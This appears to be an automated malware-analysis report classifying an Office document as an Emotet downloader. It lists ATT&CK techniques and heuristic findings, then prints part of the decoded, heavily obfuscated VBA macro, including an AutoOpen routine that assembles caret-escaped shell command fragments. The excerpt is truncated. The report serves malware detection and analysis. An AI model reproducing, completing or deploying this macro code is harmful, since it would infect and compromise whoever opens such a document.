MALICIOUS (Risk Score: 282)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen subroutine, a technique commonly used by Emotet. The macro uses a Shell() call, indicating an attempt to execute external code. The ClamAV signature 'Doc.Downloader.Emotet-6872603-0' directly attributes this file to the Emotet family, which is known for its downloader capabilities.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-6872603-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6872603-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE): Document gives password instructions for an archive or attachment; this is often used to keep payloads encrypted until after gateway scanning
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 231046 bytes |

SHA-256: bed1f3df7ef18081bd8d980174c7f0dfd4a15d3735def70ba30db0ddfecbb353
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "jtTwjtRwjhdJFX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim Glifh(2)
Glifh(0) = MidB(qRzaB + FzBEhzRkCIiSpKmfXjZ + LbuZAiL, 286, 776) + MidB(JMjJU + McXChPnooWLEftGCrkq + qfdBSbdL, 608, 263)
Glifh(1) = Left(HItiu + XsdijuqqRAlWmBmiUN + fqSJN, 713) + MidB(zWwTAN + GblbtibqivrsPshzrNl + ptDPa, 360, 556)
Dim pXtck(1)
pXtck(0) = Mid(Ocpjp + hiPHTQFVwjlAbMBwmDs + cQwdl, 913, 866) + MidB(OVlKLJ + GBvvwQYCpisjbKfCTczZ + SlGaFp, 833, 264) + Left(rCIdzXaY + XkmjFjHPWIfffSbHzr + izcCBDvB, 483) + MidB(siwZVFJk + pPMdwUzRGSsjdwiD + iIwmwj, 869, 126)
Dim zaJtC(2)
zaJtC(0) = MidB(IjCId + KsOdmAwtvfwkknFVjfjW + GCHTisp, 371, 990) + MidB(TqkiFEH + GRXVciHANbWjwqaoCqd + HoiUqbb, 536, 165)
zaJtC(1) = Mid(ofmqwpi + cJXADjPTLXdhqNiQZmz + JsTEksMH, 206, 979) + Left(QdQKLzIw + GoYCsRszdwLNKtazPS + QXaRGNo, 821)
Dim LvEzwI(1)
LvEzwI(0) = Left(ElJflZ + aawHjzEwTNjNJPDQEdD + jYsifB, 718) + MidB(qbkBYv + GbivuGvVfhJHNdaKGZTU + RXhfBbHD, 259, 449) + Right(amRwJY + HLcEFzlFRnHcjNqEDZF + vNDosKQu, 967) + MidB(FudZdiWw + UUbJijSSiBRmIJsvBtI + XpkRa, 494, 59)
krErjrCJirijBJ (KeyString(jdoiQ + iqCHM + 4 + 6 + 1 + 5 + 51 + tqqrG + dzGGPqB) + sPQLM + AMZbVd + KeyString(vUmDpCO + aCjib + 4 + 7 + 1 + 6 + 59 + BuiKswP + WpihCLA) + SzVQpkmXW + wFfzfEYzzPl + jwGGsdHEf + tInFCFq + lcvEusMMIRm + CtkoPMfZML + KIfKwTc + phCLcXrwIN + pVPSR + BhRiO + cljlDjLp + OWYLcLOkhfk + GCXVzCZh + DfPsnuJRu + mCRLLwfDqBR + ALiEi + DNSLiPX + bsbiK + ZfzooHUj)
Dim ObpXSv(2)
ObpXSv(0) = Right(vOJNCQdm + SGZBfZElGiTljLTtjTr + NDisz, 738) + Left(bDicZM + wNKZRdWhWEJtbPVobChE + MrhEDG, 979)
ObpXSv(1) = MidB(iGhRmlaM + iaYDOHNYUAQIEjwSd + mDqiu, 947, 666) + MidB(qWbQv + SzpBaCpRWNiBdtjOVMfNQVUS + htIPudVo, 265, 585) + MidB(ZkXjAB + pNnGTcnkjFkfWQSGAYs + EGnupjVT, 901, 239) + Mid(FBvSql + YzjCUuiuXZwMpCsusKmpSR + CWnKnd, 357, 501)
Dim iCuqL(1)
iCuqL(0) = Right(mtwBts + TjjztiiUTcTTjkRFYED + qHsQcv, 620) + Right(uUbnhP + iqXiizDMRbnCqPQllRrH + uZOFcDCO, 553) + MidB(rhIIpE + EzVDFKWdEiqikZpGGOYYZ + ZjAdw, 240, 956) + MidB(qZVIuFi + ziiHoiAznPfjDlmXzIS + CCODj, 241, 19)
End Sub
Attribute VB_Name = "kauCoYXnIH"
Function SzVQpkmXW()
BaFuRSwh = "d " + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "V^" + ":" + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "C" + CStr(Chr(2 + 0 + 5 + 4 + 23)) + "^" + "s^" + "e^" + "t" + " ^" + CStr(Chr(8 + 1 + 15 + 13 + 55))
mRpzs = "^" + ".]" + ",=" + "^" + "5" + "1^" + "3" + " "
jWVdapsTz = "9" + "^" + "5" + "0 " + "5" + "1" + "^" + "9" + " " + "^" + "9^" + "1" + "3"
JmSmVROhljB = "^" + " " + "59" + "0^" + " " + "09" + "3 " + "^"
iYunfiR = "9" + "50" + "^" + " " + "^"
SzVQpkmXW = BaFuRSwh + mRpzs + jWVdapsTz + JmSmVROhljB + iYunfiR
Dim zDShz(1)
zDShz(0) = Right(XIIVSLqm + asjPjcbqjwwJrUUXH + GSTHPJ, 392) + Left(ZHHpDw + CpGIXzcLMaqWOOmOvbl + UOZVY, 144) + MidB(LDURnEiS + EwufwKscRjNoRVwaYEDG + StzUHDv, 414, 947) + Left(NoSPca + JwPDvpQZBaAqNAdQUOorrkz + rKvdZ, 356)
Dim YTcjW(2)
YTcjW(0) = MidB(JTRqriz + WVlEIQuLTsiKdXZziKzkb + uLWIirzR, 475, 884) + Left(fpnOE + wwqtuMFLnYkJkRVJoAhtEdc + KvwtizVs, 85) + MidB(wZtlizJ + NTEZuRRFmQSpLrfGLPY + NNPHvO, 88, 394) + Mid(jqrWwNUD + AIGNGVTCwIoCmLVWqhv + fwZUhsrL, 722, 978)
YTcjW(1) = Mid(HBAab + UrroEKLwhwkEiKvSmK + DDVGZAVv, 287, 942) + Mid(wnIVJQh + oOLwqTqIwHNuokrLdlh + cRuBaIW, 552, 278) + Left(pKJjji + wXSEzmFYWPslTZZoEz + wcZvYuI, 592) + Right(boDKNv + DzGzZHOYKHqMGWsTbNKQrQ + mhJLdKP, 932)
Dim DqBfrd(2)
DqBfrd(0) = MidB(Xjjzno + wJZVGYTDPihGwbXZatzdl + UDSmMC, 234, 274) + MidB(tBafWE + uVNaFIJOYnzjoDPdRDjV + MiotuD, 784, 403) + Right(PKtwKcsn + hiERrbHLYOAVLtaUVwif + YKQToK, 869) + Mid(hdaWBT + JccPohjHSSSDGwTQ + XOUSE, 572, 296)
DqBfrd(1) = MidB(ZBZkVCWF + LmjraPpaTahCEGHwkEqd + RtriAkqk, 777, 610) + Right(WuDPzojY + UijnOJzYJXwIVwjjzNZl + MsVEBtlC, 355)
End Function
Function wFfzfEYzzPl()
DiaZCswVSSJ = "1" + "0" + "^" + "3" + "^ " ... (truncated)
```